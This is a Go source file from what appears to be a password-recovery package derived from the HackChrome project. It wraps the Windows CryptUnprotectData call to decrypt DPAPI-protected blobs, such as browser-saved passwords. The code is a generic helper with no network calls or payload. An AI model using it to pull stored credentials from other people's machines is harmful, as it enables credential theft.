/
win32crypt.go
42 lines (37 loc) · 1023 Bytes
/
win32crypt.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
package recovery_passwords
//https://github.com/cckuailong/HackChrome/blob/master/utils/win32crypt.go
import (
"syscall"
"unsafe"
)
type DATA_BLOB struct {
cbData uint32
pbData *byte
}
func NewBlob(d []byte) *DATA_BLOB {
if len(d) == 0 {
return &DATA_BLOB{}
}
return &DATA_BLOB{
pbData: &d[0],
cbData: uint32(len(d)),
}
}
func (b *DATA_BLOB) ToByteArray() []byte {
d := make([]byte, b.cbData)
copy(d, (*[1 << 30]byte)(unsafe.Pointer(b.pbData))[:])
return d
}
func WinDecypt(data []byte) ([]byte, error){
dllcrypt32 := syscall.NewLazyDLL("Crypt32.dll")
dllkernel32 := syscall.NewLazyDLL("Kernel32.dll")
procDecryptData := dllcrypt32.NewProc("CryptUnprotectData")
procLocalFree := dllkernel32.NewProc("LocalFree")
var outblob DATA_BLOB
r, _, err := procDecryptData.Call(uintptr(unsafe.Pointer(NewBlob(data))), 0, 0, 0, 0, 0, uintptr(unsafe.Pointer(&outblob)))
if r == 0 {
return nil, err
}
defer procLocalFree.Call(uintptr(unsafe.Pointer(outblob.pbData)))
return outblob.ToByteArray(), nil
}